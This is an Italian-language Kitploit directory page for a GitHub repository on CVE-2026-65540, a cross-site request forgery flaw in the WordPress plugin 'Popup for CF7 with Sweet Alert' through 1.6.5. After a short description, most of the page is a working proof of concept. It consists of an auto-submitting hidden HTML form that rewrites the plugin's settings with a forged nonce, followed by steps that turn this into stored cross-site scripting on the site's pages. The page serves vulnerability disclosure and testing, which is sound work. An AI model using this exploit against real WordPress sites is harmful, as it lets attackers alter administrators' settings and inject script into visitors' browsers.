Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-65540 — Popup per CF7 con Sweet Alert <= 1.6.5 - Cross-Site Request Forgery | Kitploit
Strumenti/GitHubGitHub/testardou/cve-2026-65540
Scanner di Vulnerabilità WebAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza Web
GitHubtestardou/cve-2026-65540

CVE-2026-65540

Popup per CF7 con Sweet Alert <= 1.6.5 - Cross-Site Request Forgery

Vedi Repository
14h 33m faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-65540

Popup per CF7 con Sweet Alert <= 1.6.5 - Cross-Site Request Forgery

URL del plugin

https://wordpress.org/plugins/cf7-sweet-alert-popup/

Descrizione

Il gestore delle impostazioni del plugin contiene un errore logico nella verifica del nonce che disabilita ogni protezione CSRF. Un attaccante non autenticato può sfruttarlo inducendo un amministratore autenticato a visitare una pagina malevola con un form nascosto che si invia automaticamente, modificando arbitrariamente le impostazioni del plugin. I valori inviati vengono memorizzati senza sanitizzazione e iniettati testualmente in un blocco

POC

  1. Ospita la seguente pagina HTML su un server separato:
root@kitploit:~
<!DOCTYPE html>
<html>
<body>
<h1>Hello</h1>

<form style="visibility:hidden" action="http://TARGET/wp-admin/admin.php?page=cf7-simplepopup"
      method="POST" id="csrf" target="hiddenframe">
  <input name="cf7simplePopupWidth" value="500;alert(document.domain)">
  <input name="cf7simplePopupNonce" value="invalid_nonce">
</form>
<script>document.getElementById('csrf').submit();</script>
</body>
</html>
  1. Accedi a WordPress come amministratore
  2. Visita la pagina malevola
  3. (Opzionale) Vai su http://TARGET/wp-admin/admin.php?page=cf7-simplepopup — verifica che il campo Width ora contenga 500;alert(document.domain)
  4. Visita una qualsiasi pagina frontend — alert(document.domain) viene eseguito nel browser confermando l'XSS memorizzato
Scarica lo strumento